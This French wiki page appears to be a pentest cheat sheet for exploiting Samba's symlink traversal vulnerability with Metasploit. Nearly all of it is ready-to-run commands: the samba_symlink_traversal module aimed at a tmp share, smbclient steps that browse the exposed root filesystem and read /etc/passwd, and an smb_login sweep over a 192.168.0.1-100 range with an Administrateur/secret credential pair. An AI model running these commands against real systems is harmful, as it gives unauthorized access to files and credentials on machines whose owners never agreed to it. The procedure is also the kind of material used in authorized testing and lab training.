Samba anonyme
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Exploitation Samba / SMB |
| Module | admin/smb/samba_symlink_traversal
|
| Effet | Traversée par lien symbolique + accès anonyme |
| Voir aussi | Ubuntu metasploit · Scans metasploit |
Exploitation de la vulnérabilité de traversée par lien symbolique de Samba (samba_symlink_traversal) : le partage tmp est détourné pour accéder à l'ensemble du système de fichiers en accès anonyme.
Accès anonyme, lister les partages :
smbclient -L hostname
Procédure
msfconsole
use auxiliary/admin/smb/samba_symlink_traversal
set RHOST 192.168.0.18
set SMBSHARE tmp
exploit
exit
Puis parcourir le système de fichiers exposé :
smbclient //192.168.0.18/tmp
# dans le client smb :
cd rootfs
cd etc
more passwd
Valider les connexions SMB (Server Message Block)
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.0.1-100
set SMBuser Administrateur
set SMBpass secret
run
Voir aussi
- Ubuntu metasploit — autres failles Samba sous Linux
- Scans metasploit — prise d'empreinte SMB